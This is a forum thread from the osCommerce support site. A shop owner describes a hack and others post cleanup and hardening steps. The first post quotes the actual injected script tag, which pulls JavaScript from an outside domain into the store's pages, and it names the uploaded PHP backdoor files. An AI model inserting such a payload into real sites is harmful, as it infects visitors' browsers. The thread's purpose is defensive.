Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Sites hacked


gotlib

Recommended Posts

Hello,

my oscommerce was hacked. There was added the code </title><script src=http://tiasissi.com.br/revendedores/jquery/></script><title> to the table configuration column configuration value and some strange files like alibaba.php cikrak.php coke.php cok.php were uploaded into images directory.

 

Does anybody know how to avoid this attack?

 

Thank you.

 

Jan

Link to comment
Share on other sites

Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) If you feel you can not perform any of the above steps, you should seek professional help to ensure all malware is removed.

 

 

Chris

Link to comment
Share on other sites

Jan,

 

 

v2.3.1 does not have the security vulnerabilities that previous versions had. It is a stronger core structure and has enhanced security features. So, to answer your question....yes, creating a new site with v2.3.1 would eliminate the security issues.

 

 

 

 

Chris

Link to comment
Share on other sites

 

would it be better if I install version 2.3.1? Can I avoid this problems with that?

 

Jan

 

You can also secure your existing site by applying the fixes available on this forum. Migrating to 2.3.1 is not an easy job unless you are going to pay somebody to do that for you.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...